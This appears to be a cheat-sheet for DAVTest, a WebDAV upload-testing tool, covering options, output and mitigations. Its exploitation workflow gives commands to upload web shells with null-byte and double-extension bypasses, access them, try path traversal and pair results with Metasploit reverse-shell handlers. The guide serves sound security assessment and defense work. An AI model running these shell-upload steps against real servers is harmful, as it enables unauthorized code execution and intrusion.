DAVTest

DAVTest is a Perl-based tool that automates the testing of WebDAV-enabled servers to identify upload vulnerabilities, executable file type handling, and directory manipulation capabilities. It methodically tests which file types can be uploaded and executed, making it essential for WebDAV security assessments.

Installation

# On Debian/Ubuntu
sudo apt-get install davtest

# From source
git clone https://github.com/Graph-X/davtest.git
cd davtest
chmod +x davtest.pl
./davtest.pl -h

Basic Syntax

davtest [OPTIONS] -url <target_url>

Core Options

Option	Description
-url <URL>	Target WebDAV server URL (required)
-directory <dir>	Create/use specific directory for tests
-auth <user:pass>	Basic HTTP authentication
-move	Test MOVE method capabilities
-copy	Test COPY method capabilities
-put	Test PUT file upload (default)
-sendfile <file>	Upload specific file instead of test files
-cleanup	Remove test files after completion
-quiet	Minimal output
-debug	Verbose debug output
-version	Display version information

Testing WebDAV Upload Capabilities

# Basic WebDAV vulnerability scan
davtest -url http://target.com/webdav/

# Test with authentication
davtest -url http://target.com/webdav/ -auth admin:password

# Verbose output for detailed results
davtest -url http://target.com/webdav/ -debug

# Test specific directory
davtest -url http://target.com/webdav/ -directory /test_dir

File Type Testing Strategy

File Type	Extension	Executable Risk	Common Usage
Active Server Pages	.asp, .aspx	High	IIS servers
PHP	.php, .php3, .php4, .php5	High	Linux servers
Perl Scripts	.pl, .cgi	High	Web servers
JSP	.jsp	High	Java servers
Compiled Executables	.exe, .com	Medium	Windows
Shell Scripts	.sh, .bat	High	Bash/batch execution
Text/Data	.txt, .jpg, .png	Low	Non-executable

Advanced Exploitation Techniques

Upload Shell with Extension Bypass

# Test null-byte bypass (.php%00.txt)
davtest -url http://target.com/webdav/ -sendfile shell.php%00.txt

# Test double extension (.php.jpg)
davtest -url http://target.com/webdav/ -sendfile shell.php.jpg

# Test alternative extensions
davtest -url http://target.com/webdav/ -sendfile shell.php5

Directory Manipulation

# Create directory and test uploads
davtest -url http://target.com/webdav/ -directory /uploads

# Test MKCOL (make collection) capability
davtest -url http://target.com/webdav/
# DAVTest will attempt MKCOL operations automatically

MOVE and COPY Operations

# Test MOVE method for file relocation
davtest -url http://target.com/webdav/ -move

# Test COPY method for file duplication
davtest -url http://target.com/webdav/ -copy

# Combine with upload to test moving files to executable locations
davtest -url http://target.com/webdav/ -move -sendfile webshell.txt

Understanding DAVTest Output

Success Indicators

/usr/bin/davtest.pl:
  ========================================
  PROPFIND		SUCCEED
  MKCOL		SUCCEED
  PUT text		SUCCEED
  PUT php		SUCCEED
  PUT jsp		SUCCEED
  PUT exe		FAIL
  PUT aspx		FAIL

Result	Meaning	Risk
SUCCEED	Operation allowed	High vulnerability
FAIL	Operation blocked	Lower risk
FORBIDDEN	Explicitly denied	Protected
TIMEOUT	Server not responding	Check connectivity

Test File Locations

# DAVTest creates temporary test files like:
# davtest.txt
# davtest.php
# davtest.jsp
# davtest.aspx
# davtest.cgi
# davtest.html

Practical Exploitation Workflow

Step 1: Enumerate WebDAV Methods

# Test what WebDAV methods are enabled
davtest -url http://target.com/webdav/

Step 2: Identify Executable File Types

# DAVTest automatically tests common executable extensions
# Results show which can be uploaded and accessed
davtest -url http://target.com/webdav/ -debug

Step 3: Upload Web Shell

# If .php files succeed, upload a PHP shell
davtest -url http://target.com/webdav/ -sendfile shell.php

# If .txt is allowed but .php blocked, try null-byte trick
davtest -url http://target.com/webdav/ -sendfile shell.php.txt

Step 4: Access Uploaded Shell

# Navigate to uploaded file
curl http://target.com/webdav/shell.php

# Or in browser
http://target.com/webdav/shell.php

Common Vulnerable Configurations

Microsoft IIS with WebDAV

# IIS often allows ASP/ASPX upload and execution
davtest -url http://target.com/uploads/ -auth domain\user:pass
# Look for SUCCEED on .aspx files

Apache with WebDAV Module

# Apache mod_dav may allow PHP execution
davtest -url http://target.com/dav/
# Test for PHP execution capability

SharePoint WebDAV

# SharePoint sometimes enables WebDAV for document libraries
davtest -url http://sharepoint.target.com/sites/Documents/
# Check for document upload and execution

Defense and Mitigation

Defense	Implementation
Disable WebDAV	Remove or disable mod_dav module
Whitelist extensions	Only allow safe file types (.pdf, .doc, .txt)
Store outside webroot	Upload to directory not web-accessible
Disable execution	Use .htaccess or web.config to prevent script execution
Authentication	Require strong auth on WebDAV endpoints
Validate uploads	Check MIME types and file signatures

Securing WebDAV Endpoints

Apache Configuration

# Disable WebDAV module
sudo a2dismod dav
sudo a2dismod dav_fs
sudo systemctl restart apache2

Nginx Configuration

# Block WebDAV methods
location / {
    limit_except GET POST {
        deny all;
    }
}

IIS Configuration

# Disable WebDAV in IIS
Remove-WindowsFeature WebDAV-Publishing

Troubleshooting

Connection Refused

# Check if WebDAV is actually enabled
curl -v -X PROPFIND http://target.com/webdav/

# Look for "WebDAV" in response headers

Authentication Failures

# Verify credentials before running davtest
davtest -url http://target.com/webdav/ -auth user:pass -debug

No Executable Types Allowed

# Try alternative locations or nested directories
davtest -url http://target.com/webdav/subdir/ -directory /test

# Check for path traversal opportunities
davtest -url http://target.com/webdav/../cgi-bin/

Integration with Metasploit

# Use davtest results to guide MSF modules
# exploit/windows/fileformat modules
# exploit/multi/handler for reverse shells

Best Practices

• Always get authorization before testing WebDAV servers
• Document all findings in detailed reports
• Test in isolated lab environments first
• Run cleanup to remove test files: davtest -url http://target.com/ -cleanup
• Combine davtest with other tools (curl, nmap WebDAV detection)
• Test multiple file types systematically
• Check file access restrictions after upload
• Verify execution context (system user, privileges)

Related Tools

Tool	Purpose
curl	Manual WebDAV testing with custom methods
nmap	Detect WebDAV with http-webdav-scan
Burp Suite	Intercept and manipulate WebDAV requests
nikto	Web server vulnerability scanning
metasploit	Exploit WebDAV vulnerabilities

Resources

• OWASP WebDAV Security
• CWE-434: Unrestricted Upload of File with Dangerous Type
• CVE databases for WebDAV RCE vulnerabilities
• RFC 4918: HTTP Extensions for Web Distributed Authoring and Versioning